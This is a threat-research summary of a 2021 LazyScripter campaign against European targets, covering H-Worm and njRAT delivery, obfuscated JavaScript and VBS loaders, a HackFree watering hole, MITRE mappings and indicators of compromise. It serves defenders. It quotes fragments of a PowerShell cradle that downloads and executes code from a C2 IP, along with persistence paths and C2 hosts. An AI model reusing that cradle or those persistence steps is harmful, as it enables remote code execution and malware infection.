Threat Research

double compromise in a single obfuscation

Securonix

Researchers tracked a LazyScripter campaign in 2021 targeting European entities, revealing a double-compromise chain involving H-Worm and njRAT delivered via obfuscated scripts. They also uncovered use of a free online obfuscation service and a waterhole-style setup via HackFree, enabling dual infections for some victims. #LazyScripter #H-Worm #njRAT #HackFree #UNWTO #IATA #duckdns

Keypoints

  • LazyScripter is identified as the threat actor behind a 2021 European-targeted infection campaign.
  • The campaign features a “double compromise” where LazyScripter’s script loader enables a second threat (H-Worm) and a potential njRAT payload.
  • Initial access occurs via spearphishing attachments: a PDF and two JavaScript files were delivered by phishing emails.
  • The JavaScript files are highly obfuscated and drop a VBS script that establishes persistence and C2 contact.
  • Persistence uses startup folder LNK, startup registry keys, and a scheduled/auto-run mechanism to maintain access.
  • H-Worm is delivered via a deobfuscated VBS loader, with a date-based trigger that can drop njRAT and reconfigure persistence.
  • HackFree.org is used as an online obfuscation service and waterhole component, injecting malware into obfuscated scripts and enabling broader infection.

MITRE Techniques

  • [T1566.002] Spearphishing Attachment – Initial access via phishing emails attaching a PDF and two JavaScript files. “phishing emails… attach three compressed files: a pdf document, and two JavaScript files.”
  • [T1027.001] Obfuscated/Compressed Files and Information – Use of a free online obfuscating tool to hide payloads and inject a downloader for njRAT. “…the usage of a free and popular online obfuscating tool for scripts, which would inject their own downloader for a njRAT sample within LazyScripter’s malware.”
  • [T1059.005] Visual Basic/VBScript – VBScript loader that drops additional payloads and enables multi-stage infection. “the VBS script acted as some sort of loader for the final stage artifact…”
  • [T1059.001] PowerShell – Direct PowerShell execution to fetch and run code. “[System.Net.WebClient]$webClient = New-Object System.Net.WebClient;… IEX $results”
  • [T1105] Ingress Tool Transfer – Downloading/Executing code from a remote URL as part of the loader sequence. “…OpenRead(‘http://185.81.157.186/NDA/199.png’); … IEX $results”
  • [T1547.001] Boot or Logon Autostart Execution – Persistence via Run Keys and Startup Folder equivalents. “persistence mechanism would be established using the registry keys: HKLMSOFTWAREWow6432NodeMicrosoftWindowsCurrentVersionRuntk”
  • [T1023] Shortcut Modification – Creation of a startup LNK file to trigger execution. “C:UsersLucasAppDataRoamingMicrosoftWindowsStart MenuProgramsStartupwindowsUpdate.lnk”
  • [T1071.001] Web Protocols – C2 communications over HTTP(S). “C2 contact through HTTP POST requests to the port 449 of the IP address 45.91.92.112”
  • [T1189] Drive-by Compromise/Watering Hole – HackFree.org waterhole activity injecting malware into obfuscated scripts. “hackfree].org was injecting their own malware in every obfuscated script via their website, and this would lead … a waterhole attack.”

Indicators of Compromise

  • [SHA256] 0fc8d0c3b6ab22533153b7296e597312fc8cf02e2ea92de226d93c09eaf8e579 – sample hash
  • [SHA256] 77afef33c249d4d7bb076079eff1cca2aef272c84720e7f258435728be3bf049 – sample hash
  • [SHA256] 82f6c8b52103272fcfb27ac71bd4bff76ee970dd16e5cdf3d0cfb75d10aa0609 – sample hash
  • [SHA256] 5803ded992498b5bd5045095ca1eab33be8a4f9d785fdfc8b231127edf049e72 – sample hash
  • [SHA256] f5359df2aaa02fbfae540934f3e8f8a2ab362f7ee92dda536846afb67cea1b02 – sample hash
  • [SHA256] c685897eb3f32ced2b6e404e424ca01d0bc8c88b83da067fbef7e7fe889cffad – sample hash
  • [SHA256] 23ea10f4b1a73a4e8b13466fff8983110216779d2d3cefe1fc151c6bb65c3b42 – sample hash
  • [IP] 45.91.92.112:449 – C2 address used for HTTP POST C2 communication
  • [IP] 185.81.157.186 – C2 address
  • [IP] 192.64.119.125 – C2 address
  • [IP] 157.245.250.76 – C2 address
  • [IP] 66.29.130.204 – C2 address
  • [IP] 147.182.192.241 – C2 address
  • [IP] 103.73.64.115 – C2 address
  • [URL] http://185.81.]157.186/NDA/199.png – delivered payload URL
  • [URL] http://157.245.]250.76/MORE%20INFORMATION%20ON%20OFFERS.zip – delivered payload URL
  • [Domain] stub.]ignorelist.com – C2 domain
  • [Domain] securessl.]fit – C2 domain
  • [Domain] gowaymevps.]xyz – C2 domain
  • [Domain] milla.publicvm.]com – C2 domain
  • [Domain] internetexploraldon.]sytes.net – C2 domain
  • [Domain] jbizgsvhzj22evqon9ezz8bmbupp1s6cprmriam1.duckdns.]org – C2 domain
  • [Domain] saqicpcgflrlgxgoxxzkbfrjuisbkozeqrmthrzo.duckdns.]org – C2 domain
  • [Domain] u1153246fov.ha004.t.justns.]ru – C2 domain
  • [File] C:UsersLucasAppDataRoamingMicrosoftWindowsStart MenuProgramsStartupwindowsUpdate.lnk – startup persistence file
  • [Registry] HKLMSOFTWAREWow6432NodeMicrosoftWindowsCurrentVersionRuntk – Run key
  • [Registry] HKUSoftwareMicrosoftWindowsCurrentVersionRuntk – Run key

Read more: https://lab52.io/blog/very-very-lazy-lazyscripters-scripts-double-compromise-in-a-single-obfuscation/